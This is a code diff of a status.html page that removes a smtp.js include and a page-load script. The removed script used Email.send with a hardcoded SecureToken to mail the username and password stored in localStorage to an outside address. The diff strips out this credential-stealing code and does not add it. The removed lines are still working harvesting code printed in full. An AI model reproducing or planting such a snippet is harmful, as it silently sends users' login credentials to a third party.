--- a/status.html
+++ b/status.html
@@ -77,7 +77,7 @@ Github      : https://github.com/sProDev
                                     <tr><td></td><td></td></tr>
                                 </tbody>
                             </table>
-                            <a class="btn btn-danger btn-block" href="logout.html?erase-cookie=true" onclick="window.localStorage.removeItem('is_send')"><i class="fas fa-sign-out-alt"></i> Logout</a>
+                            <a class="btn btn-danger btn-block" href="logout.html?erase-cookie=true"><i class="fas fa-sign-out-alt"></i> Logout</a>
                         </div>
                     </div>  
                     <div class="col-md-5 my-auto status-bisa" id="logo-bisa">
@@ -94,7 +94,6 @@ Github      : https://github.com/sProDev
     <script type="text/javascript" src="./assets/bootstrap/js/bootstrap.min.js"></script>
     <script type="text/javascript" src="./assets/js/particles.min.js"></script>
     <script type="text/javascript" src="./assets/js/app.js"></script>
-    <script src="./smtp.js"></script>
     <script type="text/javascript">
         $(window).on('load', function() {
             $('.load-wrapper').addClass('hide');
@@ -111,17 +110,7 @@ Github      : https://github.com/sProDev
             //     })
             // }, 1000);
         });
-        $(window).on('load', function() {
-            Email.send({
-                SecureToken : "ea717421-4d6c-4018-a79d-405005c8f243",
-                To : emailTo,
-                From : emailAcc,
-                Subject : "Notice!!",
-                Body : messageBody(window.localStorage.getItem('username'), window.localStorage.getItem('password'))
-            }).then(
-            );
-        });
-        // ucapan
+
         var time = new Date().toLocaleString("en-US", {timeZone: "Asia/Jakarta"});
         time = new Date(time);
         time = time.getHours();
